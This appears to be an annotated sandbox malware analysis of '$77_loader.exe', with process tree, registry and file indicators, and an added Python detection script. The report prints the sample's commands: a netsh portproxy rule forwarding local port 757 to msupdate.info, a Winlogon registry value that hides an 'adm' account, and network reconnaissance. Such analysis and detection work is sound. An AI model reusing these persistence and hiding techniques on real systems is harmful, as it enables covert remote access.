Analysis
max time kernel: 145s
max time network: 146s
platform: windows10-2004_x64
resource: win10v2004-20220414-en
submitted: 03-05-2022 11:43 (3 May 2022: the sandbox images used are dated 2022-04-14, so only the day-month-year reading is consistent)

Tasks
static1 (static task)
behavioral1 (behavioral task): $77_loader.exe on win7-20220414-en
behavioral2 (behavioral task): $77_loader.exe on win10v2004-20220414-en

The signatures and process tree below are from the windows10-2004_x64 run (behavioral2); the win7 run is not shown on this page.
General
Target: $77_loader.exe
Size: 397KB
MD5: aff57ee1a4f3731c2036046910f78fb4
SHA1: ef9627c0cadff85a3dfaab6aef0b7c885f03b186
SHA256: 3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4
SHA512: 5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f

The "$77" prefix is the naming convention the open-source r77 rootkit uses for files and processes it hides, so the filename suggests the loader is meant to run alongside that rootkit. Nothing in this report shows a rootkit being installed; treat that as a lead taken from the name alone, not as a finding.
Malware Config
(nothing extracted)

Signatures

Downloads MZ/PE file

Executes dropped EXE (1 IoC)
Processes: RMS.exe (PID 2004)
Sets file execution options in registry (2 TTPs; no IoCs listed)

Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence check.
Processes: $77_loader.exe
  Key value queried: \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation
Modifies WinLogon (2 TTPs, 3 IoCs)
Processes: $77_loader.exe
  Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
  Key created: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0"
A DWORD of 0 under Winlogon\SpecialAccounts\UserList hides the account of that name (here "adm") from the logon screen and the user-switching UI; the account still exists and can still authenticate, for example over RDP or with runas. The two "Key created" events show that neither SpecialAccounts nor UserList existed on the image before the loader ran. The report records no account creation, so either an "adm" account already exists or it is created by a step not captured here.
Modifies powershell logging option (1 TTP; no IoCs listed)

Drops file in Windows directory (2 IoCs)
Processes: $77_loader.exe
  File created: C:\Windows\SoftwareDistribution\config.xml
  File opened for modification: C:\Windows\SoftwareDistribution\config.xml
Writing under C:\Windows needs administrative rights, which is consistent with the loader enabling SeDebugPrivilege (below). SoftwareDistribution is Windows Update's working directory, which makes a new file there easy to overlook; the file's contents are not shown in the report.
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox labels this "likely ransomware behaviour", but that is a generic heuristic: nothing else in this report (no mass file writes, renames or ransom note) points to ransomware, and many legitimate programs enumerate drives.
Gathers network information (2 TTPs, 3 IoCs)
Uses a command-line utility to view network configuration.
Processes: NETSTAT.EXE (PID 4460), NETSTAT.EXE (PID 3216), NETSTAT.EXE (PID 3348)
Suspicious behavior: EnumeratesProcesses (8 IoCs)
Processes: $77_loader.exe (PID 924), 8 times
Suspicious use of AdjustPrivilegeToken (5 IoCs)
Processes:
  $77_loader.exe (PID 924): SeDebugPrivilege
  msiexec.exe (PID 3572): SeSecurityPrivilege
  NETSTAT.EXE (PID 4460): SeDebugPrivilege
  NETSTAT.EXE (PID 3216): SeDebugPrivilege
  NETSTAT.EXE (PID 3348): SeDebugPrivilege
Enabling SeDebugPrivilege only succeeds in a token that already holds it, so the loader is running as an elevated administrator on this image. The three NETSTAT.EXE entries are netstat's own doing (it enables the privilege at start-up even when run with just -na, as here), and SeSecurityPrivilege in msiexec.exe is normal for the Windows Installer service; neither is an action of the sample.
Suspicious use of WriteProcessMemory (27 IoCs)
Parent -> child writes (each pair is recorded twice in the report, RMS.exe three times):
  924 $77_loader.exe -> 3280 csc.exe
  3280 csc.exe -> 2412 cvtres.exe
  924 $77_loader.exe -> 2876 chcp.com
  924 $77_loader.exe -> 4276 netsh.exe
  924 $77_loader.exe -> 4460 NETSTAT.EXE
  924 $77_loader.exe -> 3216 NETSTAT.EXE
  924 $77_loader.exe -> 3348 NETSTAT.EXE
  924 $77_loader.exe -> 1700 netsh.exe
  924 $77_loader.exe -> 3132 netsh.exe
  924 $77_loader.exe -> 3312 netsh.exe
  924 $77_loader.exe -> 2808 netsh.exe
  924 $77_loader.exe -> 3744 netsh.exe
  924 $77_loader.exe -> 2004 RMS.exe
Every target is a process the writer itself has just created, so these are the writes a parent makes into a new child during process creation, not injection into a pre-existing process.
Processes
(depth in the tree is given in brackets; the command line and the signatures that fired on the process follow)

[1] C:\Users\Admin\AppData\Local\Temp\$77_loader.exe  PID 924
    "C:\Users\Admin\AppData\Local\Temp\$77_loader.exe"
    Checks computer location settings; Modifies WinLogon; Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
  [2] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe  PID 3280
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0coomqsh.cmdline"
      Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe  PID 2412
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84F5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC84F4.tmp"
  [2] C:\Windows\system32\chcp.com  PID 2876
      "C:\Windows\system32\chcp.com" 437
  [2] C:\Windows\system32\netsh.exe  PID 4276
      "C:\Windows\system32\netsh.exe" interface portproxy show all
  [2] C:\Windows\system32\NETSTAT.EXE  PID 4460
      "C:\Windows\system32\NETSTAT.EXE" -na
      Gathers network information; Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\NETSTAT.EXE  PID 3216
      "C:\Windows\system32\NETSTAT.EXE" -na
      Gathers network information; Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\NETSTAT.EXE  PID 3348
      "C:\Windows\system32\NETSTAT.EXE" -na
      Gathers network information; Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\netsh.exe  PID 1700
      "C:\Windows\system32\netsh.exe" interface portproxy reset
  [2] C:\Windows\system32\netsh.exe  PID 3132
      "C:\Windows\system32\netsh.exe" interface portproxy show all
  [2] C:\Windows\system32\netsh.exe  PID 3312
      "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=80 connectaddress=msupdate.info
  [2] C:\Windows\system32\netsh.exe  PID 2808
      "C:\Windows\system32\netsh.exe" interface portproxy show all
  [2] C:\Windows\system32\netsh.exe  PID 3744
      "C:\Windows\system32\netsh.exe" interface portproxy show all
  [2] C:\Users\Admin\AppData\Local\Temp\RMS.exe  PID 2004
      "C:\Users\Admin\AppData\Local\Temp\RMS.exe"
      Executes dropped EXE
[1] C:\Windows\system32\msiexec.exe  PID 3572
    C:\Windows\system32\msiexec.exe /V
    Suspicious use of AdjustPrivilegeToken

Reading the tree:
- csc.exe (the .NET 2.0 C# compiler) driven by an @*.cmdline response file in %TEMP%, with cvtres.exe turning CSC*.tmp into RES*.tmp, is the footprint of the .NET CodeDom compiler (CSharpCodeProvider): the loader compiles C# source at run time rather than shipping it compiled. The generated source and the resulting assembly are not listed in this report.
- chcp.com 437 switches the console code page to US English just before the netsh and netstat calls, most likely so that the tool output the loader reads back has a predictable encoding whatever the system locale (an inference from the ordering; the captured output is not shown).
- netstat -na (three times) and netsh interface portproxy show all (four times) enumerate listening sockets and existing proxy rules before and after the change below.
- netsh interface portproxy reset followed by add v4tov4 listenport=757 connectport=80 connectaddress=msupdate.info clears any existing rules and installs a forwarder: connections to TCP 757 on any local address are relayed to msupdate.info:80. netsh stores the rule under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy and the IP Helper service (iphlpsvc) serves it, so it survives reboots and outlives the loader. The report shows no traffic to msupdate.info; whether the name resolved during the run is not visible here.
- RMS.exe is written to %TEMP% and executed; the report does not identify what it is.
- msiexec.exe /V (PID 3572) sits at depth 1, not under the loader: that is the Windows Installer service being started by the Service Control Manager, which happens when some process asks for an MSI package to be installed, and SeSecurityPrivilege is part of its normal operation. Which package was installed, and at whose request, is not shown on this page.
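Turning the tree into detection logic: the following is an added example, not code from the sandbox or from the sample's author. It rebuilds a process tree from constructed Sysmon-style process-creation records modelled on the tree above, with two benign controls added as assumptions (the Windows Installer service and a build-tool-driven csc.exe), and applies three rules: a netsh portproxy add parsed into the forwarder it installs, csc.exe compiling from a user-writable directory, and a reconnaissance burst from a single parent. The record shape, the control entries and the RECON tool list are my choices.

```python
"""Behavioural rules over a process tree, for the chain shown above.

Added example, not the sandbox's or the sample's code. EVENTS is a constructed
list of Sysmon-style process-creation records (pid, ppid, image, command line)
modelled on this report plus two benign controls, the Windows Installer service
and an MSBuild-driven csc.exe; record shape and controls are my assumptions.
"""
import ntpath
import shlex
from collections import defaultdict

TEMP = r"C:\Users\Admin\AppData\Local\Temp"
SYS = r"C:\Windows\system32"
NET2 = r"C:\Windows\Microsoft.NET\Framework64\v2.0.50727"
LOADER = TEMP + r"\$77_loader.exe"


def q(path, *rest):
    """Quote the image path and append arguments, as process-creation logs show it."""
    return " ".join(['"' + path + '"', *rest])


EVENTS = [  # constructed: (pid, ppid, image, cmdline)
    (924, 1000, LOADER, q(LOADER)),
    (3280, 924, NET2 + r"\csc.exe", q(NET2 + r"\csc.exe", "/noconfig /fullpaths", '@"' + TEMP + r'\0coomqsh.cmdline"')),
    (2412, 3280, NET2 + r"\cvtres.exe", NET2 + r"\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86"),
    (2876, 924, SYS + r"\chcp.com", q(SYS + r"\chcp.com", "437")),
    (4276, 924, SYS + r"\netsh.exe", q(SYS + r"\netsh.exe", "interface portproxy show all")),
    (4460, 924, SYS + r"\NETSTAT.EXE", q(SYS + r"\NETSTAT.EXE", "-na")),
    (3216, 924, SYS + r"\NETSTAT.EXE", q(SYS + r"\NETSTAT.EXE", "-na")),
    (3348, 924, SYS + r"\NETSTAT.EXE", q(SYS + r"\NETSTAT.EXE", "-na")),
    (1700, 924, SYS + r"\netsh.exe", q(SYS + r"\netsh.exe", "interface portproxy reset")),
    (3312, 924, SYS + r"\netsh.exe", q(SYS + r"\netsh.exe", "interface portproxy add v4tov4",
                                       "listenport=757 connectport=80 connectaddress=msupdate.info")),
    (2004, 924, TEMP + r"\RMS.exe", q(TEMP + r"\RMS.exe")),
    (3572, 4, SYS + r"\msiexec.exe", SYS + r"\msiexec.exe /V"),  # Installer service, not under the loader
    (5100, 1000, r"C:\Program Files\MSBuild\MSBuild.exe", q(r"C:\Program Files\MSBuild\MSBuild.exe", "app.csproj")),
    (5101, 5100, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     q(r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", "/noconfig", '@"C:\\Projects\\app\\obj\\app.cmdline"')),
]


def build_tree(events):
    """pid -> record, plus a children map; parents outside the event set are tolerated."""
    procs = {pid: {"pid": pid, "ppid": ppid, "image": image, "cmdline": cmd} for pid, ppid, image, cmd in events}
    kids = defaultdict(list)
    for p in procs.values():
        kids[p["ppid"]].append(p)
    return procs, kids


def name(p):
    return ntpath.basename(p["image"]).lower()


def args(p):
    # Windows quoting: keep backslashes, strip only the quotes around each token.
    return [t.strip('"') for t in shlex.split(p["cmdline"], posix=False)[1:]]


def is_user_writable(path):
    p = path.lower()
    return ((p.startswith("c:\\users\\") and ("\\appdata\\" in p or "\\temp\\" in p))
            or p.startswith("c:\\programdata\\") or p.startswith("c:\\windows\\temp\\"))


def portproxy_adds(procs):
    """'netsh interface portproxy add ...' parsed into the forwarder it installs."""
    out = []
    for p in procs.values():
        a = [t.lower() for t in args(p)]
        if name(p) != "netsh.exe" or "portproxy" not in a or "add" not in a:
            continue
        kv = dict(t.split("=", 1) for t in a if "=" in t)
        parent = procs.get(p["ppid"])
        out.append({"pid": p["pid"], "parent": name(parent) if parent else None,
                    "proto": next((t for t in a if t in ("v4tov4", "v4tov6", "v6tov4", "v6tov6")), None),
                    "listenaddress": kv.get("listenaddress", "*"),            # omitted = every local address
                    "listenport": int(kv["listenport"]),
                    "connectaddress": kv.get("connectaddress", "localhost"),  # netsh default: this computer
                    "connectport": int(kv.get("connectport", kv["listenport"]))})
    return out


def runtime_compiles(procs, kids):
    """csc.exe spawned by, or fed a response file from, a user-writable directory:
    the CodeDom compile-at-run-time pattern in this report. Build tools stay quiet."""
    out = []
    for p in procs.values():
        if name(p) != "csc.exe":
            continue
        parent = procs.get(p["ppid"])
        rsp = [t[1:].strip('"') for t in args(p) if t.startswith("@")]
        if (parent and is_user_writable(parent["image"])) or any(map(is_user_writable, rsp)):
            out.append({"pid": p["pid"], "parent": name(parent) if parent else None,
                        "response_file": rsp[0] if rsp else None,
                        "cvtres": any(name(c) == "cvtres.exe" for c in kids[p["pid"]])})
    return out


RECON = {"netstat.exe", "netsh.exe", "chcp.com", "ipconfig.exe", "arp.exe", "route.exe",
         "whoami.exe", "systeminfo.exe", "nltest.exe"}


def recon_bursts(procs, kids, threshold=3):
    """One parent driving several host/network reconnaissance utilities."""
    out = []
    for p in procs.values():
        hits = [name(c) for c in kids[p["pid"]] if name(c) in RECON]
        if len(hits) >= threshold:
            out.append({"pid": p["pid"], "image": p["image"], "count": len(hits), "tools": sorted(set(hits))})
    return out


def run_rules(events):
    procs, kids = build_tree(events)
    return {"portproxy": portproxy_adds(procs), "runtime_compile": runtime_compiles(procs, kids),
            "recon": recon_bursts(procs, kids)}
```

The compile rule keys on where csc.exe's inputs and parent live rather than on csc.exe itself, which is why the MSBuild control (response file under a project directory) stays silent while the loader's run (response file and parent both in %TEMP%) is flagged; the portproxy rule records the listen and connect sides separately so the forwarder can be matched against the registry artefact later.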
Network
MITRE ATT&CK Enterprise v6
Downloads
(artefacts the sandbox saved from this run; only size and hashes are given, no filenames or paths)

Filesize 3KB
  MD5    6621e21b1f79d57fea5b7f660526cc0d
  SHA1   5c1951409c8a761be7de78391ace2f7fbc972c3a
  SHA256 279b9fb0494206b6562f826998ca6f2b5af552d84c142686936992c745aaae5b
  SHA512 059a22049966c4562a87e8bd1145381f11110f396569823aae6ac42f96e9e03f2125eed3a062c06332dfac893990ddde73d3919f07975293c4f35aaa15f08da4

Filesize 11KB
  MD5    c91fc1037127f6b80d0bd8214100d8a1
  SHA1   54f0e018a94ba3394fdc0d0d7ae1266c1fa2b4ec
  SHA256 81eda64e81398b2e2aa3c10f9512df43f97bbb4eff244316affc64544346d5eb
  SHA512 8ed342be209b892297c5f89fa6e0866b72ae9bda20220758b26dc9ad97382135a3e105801070fbf9638851b5d47556827ca912109d5bf22d7948f3c7a08c7a1d

Filesize 1KB
  MD5    c666d634ada8f4e17b7ea27c58c45d43
  SHA1   be0d200ce987774c64d211d1933bcfa59d422b06
  SHA256 81c8b1585aa586f7a713c6379c627731040ebd6548dd95d6226c4293b4a41512
  SHA512 4d0a5542d0b8ab822a592a215f50efa51d9af892deaef45566922e9754ecb36e85d4464a1b7f475f94cc70f765601a94759ab2a4ccc96537921c71480c2b260a

Filesize 8.3MB (this entry appears twice in the report with identical hashes)
  MD5    73f351beae5c881fafe36f42cde9a47c
  SHA1   dc1425cfd5569bd59f5d56432df875b59da9300b
  SHA256 a028816d9741540c6184091b4ae3c4e42b104f90fe3b17a55d0e4aa4c4c43824
  SHA512 f484b1260e73b3717603cfcfd62e820502480d8be57a7570e6c38612c9ea86b9335c6a42742fbdb369a37fcd5ec4c2b06f426a075582c39639128ad7be92da66

Filesize 447B
  MD5    1640a04633fee0dfdc7e22c4f4063bf6
  SHA1   3cb525c47b5dd37f8ee45b034c9452265fba5476
  SHA256 55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0
  SHA512 85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d

Filesize 309B
  MD5    d857d70711643aaf2282e7c220530081
  SHA1   8f783c6b233e7675a9a6633d5ed5f44bcc5d0779
  SHA256 042f78299f09cb6b4de318cf9c2a2758606eff5bebd25d4c2fd388d3ac03f309
  SHA512 0b0603ba42bb86466c95b37dd1a0657d646dbcfe741ff7223cf6cc54a73efa307a3c49030b06c2d8727151e353ed7c98784ccfe23e88e5f444606ae5d04277af

Filesize 652B
  MD5    1f555cf55bef11bc4dc295f80e6a3e29
  SHA1   9538a4734ecc52ac3f89b0e4411d4c61c7ae7473
  SHA256 0f53e2cfd88c6138e5784731871ef605dbc32a750c43aad3604d16ee44fe991c
  SHA512 cec2e94d0662b7ac497f104a11ccfe9bdfa70f0b89affbda8dc109633154a7a1e33424c48ac42c4bfb701e1df5bbf40765c1f91711e378332046c356add88928